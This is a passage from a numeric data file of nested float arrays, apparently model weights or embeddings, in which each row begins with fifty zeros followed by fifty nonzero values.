-0.1021, 0.03043, -0.7153, 0.4365], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.683, -0.1708, -0.3193, 0.11896, 1.969, 0.4097, -3.361, 0.0644, -6.664, -0.5146, 0.2969, 0.2208, -1.8545, 0.2037, 1.338, 0.522, -0.02028, 0.2744, 0.9326, 0.5977, -0.6216, -0.01994, -0.142, 0.579, 0.867, 0.7163, 0.2585, -0.09937, -0.4988, -0.2656, -0.9077, -0.7764, -0.323, -1.303, 1.084, -2.47, -0.2778, -6.48, -1.662, 0.1299, 0.3958, 0.5435, 0.4658, 2.227, -0.04822, -0.0865, 0.4856, 1.08, 0.0086, 0.3508], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1392, 0.1793, -0.2944, -0.008026, -4.32, 0.05872, -0.4868, -0.02103, -0.1478, 0.2646, -0.3425, 0.005367, -0.172, -0.04877, -0.08624, 0.02672, -0.07983, 0.0879, -0.0985, 0.0659, -0.002989, -0.05215, -0.3186, 0.04184, 0.6025, -0.03366, -0.1941, 0.09186, -0.01991, -0.04755, 0.11414, 0.2744, -0.002031, 0.1365, -0.0403, -0.9443, -0.04083, -0.1823, -0.4265, 0.0831, 0.163, -0.0348, 0.05237, 0.295, -2.998, 0.03317, 0.02943, -0.0724, -0.1438, -4.984], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.003326, 0.3345, -0.04398, 0.01674, 0.1178, 0.0703, 0.6294, -0.03372, 0.0348, 0.07965, -0.03195, 0.2786, -0.02328, -0.0448, -0.0591, -0.0424, -0.0409, 0.0679, 0.07666, 0.314, 0.01126, 0.1053, -0.01697, -0.02646, -0.08167, 0.0382, 0.013596, -0.1511, 0.03702, 0.02979, -0.1236, -0.2515, -0.04202, -0.2705, 0.0712, 0.2131, 0.001465, -0.1317, -0.1016, -0.008934, 0.003933, 0.0757, -0.1964, -0.01446, 0.01463, 0.05652, 0.1411, -0.0311, -0.000726, -0.08966], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0433, 1.59, -0.667, -0.0918, 1.133, -0.7705, 0.02089, 0.71, -0.11725, 0.2612, -0.0209, -0.978, -0.1398, 0.4624, -0.2754, -0.2021, -0.0859, -2.4, -0.04614, 0.3855, -7.737e-05, -0.0666, 0.5234, -0.1625, 0.538, 0.9595, -0.637, 0.309, 0.1045, 0.04257, 0.61, -0.965, -0.4446, -0.6597, 0.622, 0.4058, -0.3481, 0.01326, -0.44, -1.244, -0.0843, 0.8496, -0.05383, 1.204, 0.1311, 0.133, -3.229, -0.3289, 0.00782, -0.2014], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.553, -0.603, 0.597, -1.005, -0.2576, -0.9165, -2.14, 0.1022, 0.2705, 0.3477, -0.12115, -3.95, -8.9, 0.3892, 0.382, -0.2517, -0.10004, 0.10913, 0.3328, 0.7075, -0.324, 0.4775, -8.805, -1.547, 0.5957, 0.4187, 1.044, -1.071, -6.598, -0.3098, 0.01718, 1.358, -0.796, -1.776, -5.69, 0.86, -1.815, 0.02066, -0.6064, -1.482, -0.1377, -1.154, 1.636, 0.444, -0.3096, -0.302, 2.01, -0.761, -0.10205, 0.2009], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0008926, -0.09875, -0.0635, 0.008995, -0.1725, -0.02606, -0.1907, -0.01826, -0.01985, -0.01732, -0.0405, -0.5454, -0.1003, 0.003286, 0.04007, -0.1396, 0.014175, -0.10913, 0.1117, 0.1359, -0.0296, 0.02309, 0.06107, -0.1035, 0.1034, -0.7383, 0.02287, -0.06143, -0.004845, -0.01421, 0.0676, -0.07837, 0.02148, 0.1095, 0.03955, -0.5806, -0.06216, -0.02258, -0.05878, 0.02858, 0.0438, 0.03757, -0.0604, -0.0651, -0.09595, 0.07654, 0.09375, 0.00784, -0.00269, -0.02516], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0633, -0.1106, -0.04807, -0.01782, -0.0834, -0.05743, -0.7505, -0.04385, -0.0504, -0.10675, 0.119, 0.4556, -0.0107, 0.00577, -0.003208, -0.06146, 0.04025, 0.03275, -0.1026, -0.1321, -0.00991, -0.00907, -0.11896, 0.06885, 0.12494, -0.1393, 0.06964, 0.06494, -0.0077, -0.02367, 0.2822, -0.0001906, 0.064, -0.06036, 0.01308, -0.3718, 0.0375, -0.04123, 0.0232, -0.0512, -0.04187, 0.2915, -0.04645, -0.2654, -0.01955, 0.066, -0.4011, -0.05557, 0.0002364, -0.0867], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.865, 1.2295, -1.333, -0.9907, -4.617, 0.1305, -0.7295, -0.433, -0.2195, -0.02489, 0.01068, -0.2786, 0.3022, 0.07007, 0.1974, 0.639, -0.1212, -1.618, -0.2756, 0.494, -0.01979, 0.000639, -2.281, -0.377, 0.344, 0.5674, 0.639, -0.03476, 0.02116, -1.619, -0.1985, 1.325, -0.0662, -2.803, -0.02159, -1.121, -0.1262, -0.2747, 0.1504, -1.444, -0.2666, 0.7466, 0.003874, -4.098, -0.3997, 0.06696, -0.7207, 0.0339, 0.06555, 0.1864], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9795, 1.071, 0.784, -2.785, 2.488, -5.836, -0.3132, -2.787, 0.6685, -1.187, -0.3838, -6.67, -0.455, -0.6367, -0.6475, -0.06903, -0.1411, -0.2091, -0.794, 0.3328, -0.601, 0.5767, 0.3196, -10.0, 0.4563, -2.826, -0.367, 0.45, 0.1422, 0.06604, 0.6274, 3.676, -0.4614, -0.2556, 0.119, 0.9688, 0.00816, -4.73, -0.461, -0.00918, -0.2393, -0.1321, 1.534, 0.8833, -0.8057, 0.0771, 0.07635, -8.86, 0.08875, -0.413], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1537, -0.2874, 0.808, -0.629, 0.663, 0.2318, -0.2568, 0.03528, 0.2229, 1.187, -0.566, -0.06757, -0.1656, -0.1638, 0.2002, 0.024, -0.09607, 0.254, 0.7695, 0.7256, -0.0856, -0.2449, 1.196, -1.669, 0.2537, 0.1882, 0.398, 0.4604, -0.03513, 0.0682, -0.529, 0.5405, 0.1583, 0.323, -0.4343, 1.217, -0.2385, 0.1658, 0.1024, 0.08734, -0.0939, -2.86, -0.04712, -0.4792, -0.791, -0.3064, -0.8936, -0.03183, -0.0641, -2.262], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5317, 0.4402, -1.637, -0.04178, 0.1278, -0.052, -1.156, -0.1901, -0.0935, 0.2754, 0.00866, -4.39, -3.98, 0.0861, 0.1091, 0.2474, -0.1377, -0.02228, -0.266, -0.3042, -0.006554, 0.1501, 0.3525, -0.01089, 0.1144, 0.4631, 0.01695, -0.208, -0.0484, 0.1548, 0.248, -0.1844, -0.04736, -0.2515, 0.2842, 1.385, 0.01135, 0.1268, 0.6094, -0.3013, -0.04132, -0.6636, -0.7017, 0.08685, -0.2793, -0.1423, -0.3054, 0.06158, -0.01324, 0.0221], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.002304, 0.1486, -0.1285, -0.001797, -0.001637, 0.00534, -0.2148, 0.007416, 0.01365, -0.1967, -0.01191, 1.156, 0.01544, 0.01967, -0.005463, 0.0638, -0.02779, -0.0849, 0.254, 0.03723, 0.001042, -0.2583, -0.08746, 0.0011215, 0.1495, 0.01855, 0.01411, -0.002174, 0.0008655, -0.0917, -0.624, -0.006893, -0.1348, -0.006786, -0.03198, 0.2915, -0.002285, -0.00489, -0.004974, 0.00941, -0.1669, -1.069, 0.02266, -0.1168, -0.005135, -0.005642, 0.003952, 0.00686, -0.00241, -0.6987], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04648, 0.5513, 0.3599, -0.0802, 0.591, -0.5444, -0.2585, -0.0758, -0.1001, 0.1048, -0.01729, 0.4578, -0.07196, 0.01779, -0.0435, 0.2235, -0.0094, -0.04175, 0.06244, 0.1392, 0.09186, 0.2947, -0.001559, 0.06866, 0.2354, 0.3003, 0.1174, 0.10175, 0.02158, 0.07544, -0.03726, -0.1407, -0.02856, -0.402, 0.12164, 0.4016, 0.0656, -0.0992, -0.4934, -0.0648, 0.1621, 0.468, -0.1163, 0.2803, 0.07214, -0.0447, -0.11664, -0.0952, -0.04648, -0.0836], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.081, -0.1375, -0.12354, -0.1251, 0.001401, 0.0877, -0.03204, -0.001706, -0.05444, -0.2238, 0.01222, -0.9297, -1.246, -0.3093, 0.04742, -1.327, -6.43e-05, -0.1707, 0.02112, 0.01441, 0.006714, 0.0526, -0.2363, -1.466, 0.02339, -0.3118, -0.04294, -0.1565, -0.03094, 0.0578, -1.095, -0.9893, -0.1963, -3.695, -0.3489, 0.1884, -0.6562, -0.3506, 0.015015, -0.001133, -0.05368, 0.1683, 0.1985, -0.1937, -0.0869, -0.06757, -3.213, -0.03108, -0.1366, 0.1951], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9897, 4.074, 1.866, -1.903, -3.88, -1.009, 0.07434, 1.679, -0.4058, 0.5493, -1.431, 1.099, 1.093, -0.2388, 1.164, 0.8384, 0.388, -0.001986, 0.5337, -1.388, -0.628, -0.7197, 1.686, -0.9644, 1.435, 2.057, -0.9053, -0.591, 0.4424, -0.3306, 2.184, -0.07477, -0.0646, -1.466, 1.975, 1.958, -0.1664, 0.1846, 1.011, -0.3945, -0.4739, 2.727, 0.3862, -2.133, -0.8267, -1.383, -1.301, -0.1729, 1.219, -4.945], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.297, 0.614, 0.01775, 0.09467, 0.2874, 0.0905, 0.653, 0.02303, -0.0618, 0.00454, -0.1768, 0.793, -0.049, -0.06415, -0.04373, 0.0527, 0.07526, 0.01772, -0.464, -0.8345, -0.2622, 0.006756, 0.3215, -0.127, 0.01286, 0.2362, 0.1669, 0.153, -0.1467, 0.10846, -0.03986, -0.2401, -0.1376, -0.3496, 0.196, 0.359, -0.1697, -0.08185, 0.1736, -0.02675, -0.0784, 0.004242, -0.2815, 0.471, 0.06165, -0.004524, -0.391, 0.0679, -0.0629, 0.0645], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5576, -0.1733, 0.03925, 0.02176, -0.1084, 0.05255, -1.41, -0.001099, -0.02863, 0.0368, -0.03412, -0.004494, 0.06934, -0.007835, -0.005104, -0.04395, -0.05032, -0.052, -0.035, 0.1783, 0.01001, 0.02, -0.09546, -0.01543, 0.08575, -0.10504, -0.11395, -0.1461, 0.02348, 0.01695, 0.0983, 0.0010195, 0.002104, -3.32, -0.203, 0.1106, -0.1685, -0.06094, 0.0581, -0.01335, -0.002447, 0.1186, -1.704, -4.305, -0.0355, -0.10693, -0.1777, -0.00766, 0.013115, 0.02757], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02046, 0.02237, -0.02438, 0.01463, -0.04153, 0.0082, -0.00892, 0.0317, 0.00555, -0.00877, -0.05484, 0.02748, -0.02211, 0.00906, -0.01148, -0.04657, -0.04358, 0.01999, -0.0331, 0.04718, -0.0046, -0.02844, 0.01563, 0.02074, 0.01245, -0.0433, 0.01842, 0.01624, -0.02742, -0.0302, 0.01755, -0.009254, -0.01562, -0.02678, 0.01852, 0.03586, -0.00947, 0.0324, -0.0584, -0.02493, -0.0316, -0.01845, -0.02367, -0.006493, -0.0348, -0.02222, 0.01054, 0.00757, -0.0001469, -0.03622], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1061, 1.291, 1.769, 0.0431, -3.861, -0.1633, 0.133, -0.2372, -0.2974, -0.4707, -0.2227, 0.1359, 1.251, 0.4246, -0.2998, 0.362, -0.1473, -2.404, 1.108, -0.6943, 0.1583, -0.01468, 0.9404, 0.2302, -2.0, -1.172, 0.7393, -0.2642, 0.08875, -0.1309, -0.3992, 2.566, 0.1886, -0.611, 0.1715, 0.272, -0.2126, -4.35, -0.3054, -0.007504, -0.08453, 0.546, 1.023, 0.1746, -0.6963, -0.0698, 0.8296, -0.6104, 0.2927, -0.604], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02477, 0.01154, -0.0798, 0.1594, -4.32, -1.285, -0.426, -0.586, -0.0628, -1.271, 0.008484, -0.1602, 0.00717, 0.01293, -0.01443, -0.0005145, 0.04614, -0.02911, -0.01233, 0.06192, -0.2664, -0.0267, 0.01055, -0.452, 0.01549, -0.2389, -0.0814, 0.0802, -0.00908, 0.001167, 0.04932, -0.2832, -0.8496, -2.545, 0.02573, -0.02275, -0.005634, -0.1465, -0.12146, -2.396, 0.01799, 0.1969, -0.9683, -0.4558, 0.00459, -0.067, -2.473, -0.2659, -0.00906, -0.928], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1396, 1.065, 0.4902, -2.176, 3.127, -1.036, -1.368, -0.1556, -1.365, -0.05774, -1.463, 0.322, -0.3447, -0.533, 1.386, 0.9727, 0.131, 0.342, 0.438, 1.2, -1.576, 1.14, 0.3555, 0.2035, 0.2498, 0.1931, -0.07874, 0.08936, -1.139, 0.2954, 0.1892, -0.1472, -0.2124, -0.4282, 0.2333, -0.9106, -0.9707, -0.459, -1.756, -0.5347, 0.665, 2.322, -0.981, 1.997, -2.271, 0.0743, 0.1423, -3.297, -0.2969, 3.14], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8257, -0.699, -0.3264, -1.771, 0.2776, 0.554, 0.8125, 0.000936, -0.0111, -0.0417, -0.0806, 0.655, -0.224, -0.2277, 0.3328, 0.1669, 0.1229, -0.1776, -2.783, -0.557, -1.396, 0.05713, 0.2004, 0.2059, 0.2935, 0.3271, -0.03363, -0.07916, -1.509, 0.139, 0.04022, -1.085, -0.1455, -0.3467, 0.1923, -0.352, -0.574, -0.0987, 0.0846, -0.1255, -0.1947, -0.1765, -0.359, 0.693, 0.1531, 0.08997, -0.4133, 0.2484, -0.334, 0.074], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2292, -0.06354, -0.2057, -0.03516, 0.0823, -0.01561, 0.702, -0.03574, -0.1345, -0.173, 0.0817, -0.00847, -0.004925, 0.04565, -0.01903, 0.162, 0.0377, 0.02199, -0.16, -0.3164, 0.003664, 0.07153, -0.08496, 0.2686, 0.1932, -0.4219, -0.0202, 0.1364, 0.00575, -0.0829, -0.041, -0.2081, 0.0552, -0.1287, 0.04544, 0.3064, -0.01033, -0.05908, 0.02017, 0.02075, 0.11316, 0.09906, 0.0932, -0.00798, -0.068, 0.067, -0.0552, -0.0787, -0.007275, -0.0662], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02213, -0.1654, 0.168, 0.0421, -1.214, 0.02002, -0.629, -0.1334, 0.01672, -0.272, 0.0376, -1.941, 0.1676, 0.2261, 0.0542, -0.03818, -0.8076, -0.04956, -0.5376, -0.03757, 0.01665, -6.547, 0.3562, 0.004597, -2.635, 0.03168, -0.042, -2.65, -0.02391, -0.0948, -3.57, 0.1656, -0.05103, 0.01481, 0.244, 0.83, -0.01406, 0.00241, -0.03574, 0.03326, -0.1097, -0.7524, 0.05908, -5.832, -0.9404, 0.0657, -0.2003, -0.01444, -0.719, -0.3525], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5723, 0.12, 0.347, -0.0191, -2.027, -0.2417, 0.6646, -0.2866, -0.2383, 0.4563, -0.2031, 0.003862, 0.1732, 0.0784, -0.644, 0.656, -0.1506, 0.3271, -0.014244, 0.0678, 0.2429, -0.03262, -0.1078, 0.1422, -0.1359, -0.1006, 0.1545, 0.3123, 0.1826, 0.008156, 0.0248, -1.069, -0.0563, -0.07153, 0.0988, 0.634, 0.2583, -0.6665, 0.0846, 0.3535, 0.2993, 0.325, 0.12115, 0.5703, 0.3672, -0.158, 0.1439, -0.9175, -0.05045, 1.184], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.51, 0.5444, 0.015465, -0.01453, 0.1843, -0.08093, -3.352, -0.3835, 0.0871, 0.05145, -0.1786, 0.269, 0.637, -0.1575, -0.0783, 0.04172, -0.967, -0.08215, 0.3616, -0.28, 0.0782, 0.01888, 0.3643, -0.0844, 0.2189, 0.02675, 0.0634, 0.05734, -0.007374, -0.009155, 0.05746, 0.0947, -0.0318, -0.05396, 0.02124, -0.4614, 0.03111, -0.05804, -0.2041, -0.134, -0.1222, -0.9, -0.1069, 0.0303, 0.005623, -0.072, -0.06793, -0.02711, -0.039, -0.02156], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1486, -0.599, -0.7026, -0.4087, -0.9927, -0.03296, -2.582, -0.1823, 0.01836, -0.388, 0.06757, -1.35, 0.2754, 0.2505, -0.2927, 0.04895, -0.04736, -0.04285, 0.9946, -0.8086, -0.0652, 0.3486, 0.004623, -0.2202, 0.5854, -0.3447, 0.2183, -0.01567, -0.2817, -0.8643, -2.146, 0.4194, -0.0505, 0.061, 0.1951, 0.2583, 0.04565, -0.255, -0.6694, 0.08057, -0.3213, -0.03214, -0.11414, -0.1396, -0.1229, -0.02779, 0.00417, -0.04437, -0.089, -1.165], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.631, -0.804, 0.5547, 0.4465, 1.582, -2.17, -0.002598, 1.166, 0.746, -2.195, -0.2776, 0.3018, 0.8916, 0.1338, 0.471, 0.8516, -0.1787, -0.376, 0.1141, 0.00911, -0.1763, -0.081, -1.45, 0.3433, 0.8203, -0.7695, -0.313, -1.232, 0.0757, -0.743, -0.9517, -0.3918, 